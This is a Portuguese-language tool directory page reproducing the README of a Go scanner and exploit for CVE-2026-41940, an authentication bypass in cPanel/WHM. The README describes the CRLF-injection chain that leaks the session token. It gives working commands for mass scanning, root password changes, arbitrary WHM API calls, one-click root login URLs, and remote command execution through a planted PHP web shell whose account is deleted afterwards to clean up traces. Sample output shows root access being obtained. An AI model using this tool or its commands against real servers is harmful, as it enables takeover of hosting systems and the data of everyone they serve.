Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/kagantua/cpanelwhm-authbypass
Scanners de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAutenticaçãoRed Teaming
GitHubkagantua/cpanelwhm-authbypass

cPanelWHM-AuthBypass

Scanner e ferramenta de exploração baseada em Go para CVE-2026-41940, uma bypass de autenticação no cPanel/WHM. Suporta varredura em lote, vazamento de tokens e ações pós-exploração como RCE, alteração de senha e chamadas de API.

Ver Repositório
107há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Ferramenta de Scanner e Exploit de Bypass de Autenticação cPanel/WHM

Ferramenta de linha de comando em Go, reescrita a partir do PoC em Python do watchTowr, para detectar e explorar a vulnerabilidade de bypass de autenticação CVE-2026-41940 do cPanel/WHM.

Visão Geral da Vulnerabilidade

A CVE-2026-41940 é uma vulnerabilidade de bypass de autenticação no cPanel/WHM. A cadeia de ataque usa injeção de CRLF no cabeçalho de autenticação Basic para vazar o token de segurança e obter privilégios de root no WHM.

Cadeia de ataque em 4 etapas:

  1. Pré-autenticação — Envia credenciais incorretas para /login/ e obtém o cookie bruto whostmgrsession
  2. Injeção de CRLF — Injeta quebras de linha através do cabeçalho Authorization: Basic, induzindo o servidor a vazar o token de segurança cpsess no cabeçalho Location do redirecionamento 307
  • Propagação do token — Aciona do_token_denied para propagar os dados de autenticação injetados do armazenamento bruto para o cache
  • Verificação de privilégios — Usa o token vazado para acessar /json-api/version e verificar se obteve privilégios de root
  • Funcionalidades

    • Escaneamento em lote — Detecta alvos em massa a partir de arquivo, com execução concorrente
    • Detecção de alvo único — Verificação rápida especificando uma única URL
    • Processamento inteligente de URL — Compatibilidade automática com http://, https://, formatos sem protocolo e deduplicação automática
    • Exploração
      • Alterar a senha de root (-passwd)
      • Chamar qualquer API do WHM (-api)
      • Gerar URL de login com um clique (-session)
      • Execução remota de comandos / RCE (-cmd)
    • Destaque no terminal — [VULN] em vermelho, [SAFE] em verde
    • Salvar resultados — URLs vulneráveis são salvas automaticamente em arquivo

    Compilação

    root@kitploit:~
    # Requer Go 1.20+
    cd cpanel-checker
    go build -o cpanel-checker .
    

    Como Usar

    Visão Geral dos Parâmetros

    ParâmetroDescriçãoExemplo
    -uURL de alvo único-u https://1.2.3.4:2087
    -fArquivo contendo lista de URLs-f targets.txt
    -oCaminho do arquivo de saída (padrão result.txt)-o vuln.txt
    -cNúmero de concorrência (padrão 10)-c 20
    -hostnameEspecificar manualmente o cabeçalho Host (padrão: descoberta automática)-hostname cpanel.example.com
    -passwdAlterar a senha de root (apenas modo -u)-passwd NewP@ss123
    -apiChamar função da API do WHM (apenas modo -u)-api listaccts
    -api-paramsParâmetros da API do WHM, separados por vírgula-api-params user=root,password=123
    -sessionGerar URL de login de root com um clique (apenas modo -u)-session
    -keepManter a conta temporária do RCE sem excluir (usar com -cmd)-keep
    -cmdExecutar comando remoto / RCE (apenas modo -u)-cmd "id"

    1. Detecção de Alvo Único

    root@kitploit:~
    ./cpanel-checker -u https://target:2087
    

    A porta padrão é 2087. As seguintes formas são equivalentes:

    root@kitploit:~
    ./cpanel-checker -u https://target
    ./cpanel-checker -u target
    

    2. Escaneamento em Lote

    root@kitploit:~
    ./cpanel-checker -f targets.txt -c 20
    

    O targets.txt suporta os seguintes formatos (um por linha, linhas iniciadas com # são comentários):

    root@kitploit:~
    https://1.1.1.1:2087
    http://2.2.2.2:2087
    3.3.3.3:2087
    4.4.4.4
    # Isto é um comentário
    
    • Deduplicação automática: http://1.1.1.1 e https://1.1.1.1 são considerados o mesmo alvo, escaneado apenas uma vez
    • Endereços sem protocolo são automaticamente completados com https://
    • Endereços sem porta usam automaticamente 2087
    • Resultados salvos em result.txt (personalizável com -o)

    3. Alterar a Senha de Root

    root@kitploit:~
    ./cpanel-checker -u https://target:2087 -passwd "NewP@ssw0rd!"
    

    4. Chamar Qualquer API do WHM

    root@kitploit:~
    # Listar todas as contas
    ./cpanel-checker -u https://target:2087 -api listaccts
    
    # Chamada com parâmetros
    ./cpanel-checker -u https://target:2087 -api passwd -api-params "user=root,password=abc123"
    

    5. Gerar URL de Login com Um Clique

    root@kitploit:~
    ./cpanel-checker -u https://target:2087 -session
    

    Gera uma URL que, ao ser aberta no navegador, dá acesso ao painel de administração do WHM. No painel, use o recurso Terminal para obter um shell de root interativo.

    Nota: -session é semiatomático — a ferramenta gera a URL de login e você precisa abri-la manualmente no navegador.

    6. Execução Remota de Comandos (RCE)

    root@kitploit:~
    ./cpanel-checker -u https://target:2087 -cmd "id"
    

    Adicione -keep para manter a conta temporária, permitindo login no painel do cPanel:

    root@kitploit:~
    ./cpanel-checker -u https://target:2087 -cmd "id" -keep
    

    Ao usar -keep, a saída incluirá o nome de usuário, senha e endereço de login do cPanel (https://host:2083) da conta temporária. Use essas credenciais diretamente para entrar no painel do cPanel.

    -cmd é totalmente automático, sem necessidade de outras ações manuais. Fluxo interno:

    1. Usa o bypass de autenticação para obter privilégios de root
    2. Cria uma conta temporária do cPanel via API do WHM
    3. Escreve um shell PHP em ~/public_html/ via UAPI (Fileman::save_file_content)
    4. Acessa https://host/~tmpuser/shell.php via HTTP para executar comandos
    5. Retorna a saída do comando
    6. Exclui automaticamente a conta temporária (limpeza de rastros)

    Pré-requisito: as portas 80 ou 443 do alvo devem estar acessíveis e o Apache/httpd deve estar em execução.

    7. Uso Combinado

    Vários parâmetros de exploração podem ser usados simultaneamente:

    root@kitploit:~
    # Obter URL de login, executar comando e alterar senha ao mesmo tempo
    ./cpanel-checker -u https://target:2087 -session -cmd "id" -passwd "NewP@ss123"
    

    8. Especificar Manualmente o Cabeçalho Host

    Quando o IP do alvo não corresponde ao hostname configurado no cPanel, especifique manualmente:

    root@kitploit:~
    ./cpanel-checker -u https://1.2.3.4:2087 -hostname cpanel.example.com
    

    Por padrão, a ferramenta descobre automaticamente o hostname correto através do redirecionamento 307 de /openid_connect/cpanelid.

    Exemplo de Saída

    Escaneamento em Lote

    root@kitploit:~
    [1/5] [VULN] https://1.1.1.1:2087 - token=/cpsess1234567890
    [2/5] [SAFE] https://2.2.2.2:2087 - stage2: no cpsess token leaked (HTTP 301), likely patched
    [3/5] [SAFE] https://3.3.3.3:2087 - stage1: request failed: dial tcp: i/o timeout
    [4/5] [VULN] https://4.4.4.4:2087 - token=/cpsess0987654321
    [5/5] [SAFE] https://5.5.5.5:2087 - stage2: no cpsess token leaked (HTTP 301), likely patched
    
    ========== Escaneamento concluído ==========
    Total: 5 | Vulneráveis: 2
    
      ● https://1.1.1.1:2087
      ● https://4.4.4.4:2087
    
    [+] Resultados salvos em result.txt
    

    Execução de RCE

    root@kitploit:~
    [*] Alvo: https://target:2087
    [*] Modo: Exploração
    
    [0] hostname = cpanel.example.com
    [1] minting a preauth session...
        session base = abc123def456
    [2] sending the CRLF injection (Basic auth + no-ob cookie)...
        leaked token = /cpsess1234567890
    [3] firing do_token_denied to propagate raw -> cache...
        gadget fired
    [4] verifying we're WHM root...
    [+] Privilégios de root do WHM obtidos
    
    [*] Executando comando remoto (RCE)...
        [a] Criando conta temporária: tmpabcde
        [b] Escrevendo shell: /home/tmpabcde/public_html/random.php
        [c] Executando comando: id
        [d] Limpando conta temporária: tmpabcde
    [+] Saída do comando:
    uid=0(root) gid=0(root) groups=0(root)
    
    [+] Concluído. https://target:2087 foi comprometido
    

    Notas

    • Os parâmetros de exploração (-passwd, -api, -session, -cmd) estão disponíveis apenas no modo de alvo único -u, não suportados no modo de lote -f
    • A ferramenta ignora a verificação de certificado TLS por padrão
    • O timeout de requisição é de 15 segundos
    • Linhas iniciadas com # no arquivo de URLs são ignoradas

    Aviso Legal

    Esta ferramenta destina-se exclusivamente a testes de segurança autorizados e pesquisa. Testar sistemas sem autorização é ilegal. O usuário deve garantir que obteve autorização escrita explícita do proprietário do sistema alvo. O autor não se responsabiliza por qualquer uso indevido.

    Agradecimentos

    • PoC original: watchTowr / Sina Kheirkhah (@SinSinology)
    • CVE: CVE-2026-41940
    Baixar ferramenta